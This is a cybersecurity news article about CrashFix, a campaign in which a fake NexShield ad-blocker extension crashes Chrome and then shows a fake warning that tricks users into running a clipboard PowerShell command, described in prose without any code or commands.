Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Home/Threats/CrashFix – Hackers Using Malicious Extensions to Display Fake Browser Warnings
Threats

CrashFix – Hackers Using Malicious Extensions to Display Fake Browser Warnings

Cybersecurity researchers have recently uncovered a sophisticated malware campaign that employs an unusual, yet remarkably effective, tactic: intentionally crashing users’ web browsers. The threat,...

David kimber
David kimber
January 19, 2026 3 Min Read
35 0

Cybersecurity researchers have recently uncovered a sophisticated malware campaign that employs an unusual, yet remarkably effective, tactic: intentionally crashing users’ web browsers.

The threat, named CrashFix, operates through a malicious Chrome extension disguised as the legitimate ad blocker NexShield.

When users search for privacy tools online, malicious advertisements direct them to download what appears to be a trustworthy extension from Google’s Chrome Web Store.

The fake extension launches a coordinated attack designed to frustrate users into executing dangerous commands.

Fake CrashFix pop-up message (Source - Huntress)
Fake CrashFix pop-up message (Source – Huntress)

The campaign reveals a multi-layered infection approach targeting both home and corporate networks. Upon installation, the extension remains dormant for the first hour before activating its destructive payload.

This timing strategy creates distance between installation and problems, making it harder for victims to blame their browser troubles on recently added software.

The operation demonstrates careful planning by threat actors who understand user behavior.

Huntress analysts noted that the campaign originates from KongTuke, a tracked threat actor group active since early 2025.

Researchers identified multiple sophisticated components including the NexShield extension mimicking uBlock Origin Lite, the CrashFix attack mechanism, and a previously unknown Python-based remote access tool called ModeloRAT.

Fake CrashFix pop-up message after 'run scan' (Source - Huntress)
Fake CrashFix pop-up message after ‘run scan’ (Source – Huntress)

Corporate targets receive preferential treatment, with domain-joined machines accessing more powerful malware compared to standalone systems, suggesting attackers prioritize enterprise compromises.

The Browser Denial-of-Service Attack Mechanism

CrashFix’s core relies on a deliberate denial-of-service attack against the victim’s browser. The extension contains code creating one billion runtime port connections in an infinite loop.

NexShield header reference (Source - Huntress)
NexShield header reference (Source – Huntress)

Each port consumes memory while the array expands without bound, overwhelming the browser’s internal messaging system and consuming CPU cycles.

Memory usage climbs until system limits are reached, causing severe slowdown, frozen tabs, and complete browser crashes requiring force-quit.

User attempting to look for remediation solutions (Source - Huntress)
User attempting to look for remediation solutions (Source – Huntress)

When users restart their browser, they encounter a fake security warning claiming the browser “stopped abnormally.” The warning instructs victims to open Windows Run dialog, paste a clipboard command, and press Enter.

Unknown to users, the malicious extension previously copied a PowerShell command to their clipboard. The displayed command appears legitimate but executes a dangerous payload instead.

Attackers intentionally trigger the attack only after establishing C2 connectivity and confirming user interaction with the popup, demonstrating operational awareness.

This combines social engineering with technical exploitation for devastating results.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCybersecurityExploitHackerMalwareSecurityThreat

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

New Kerberos Relay Attack Uses DNS CNAME to Bypass Mitigations – PoC Released

Next Post

Windows SMB Client Vulnerability Enables Attacker to Own Active Directory

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us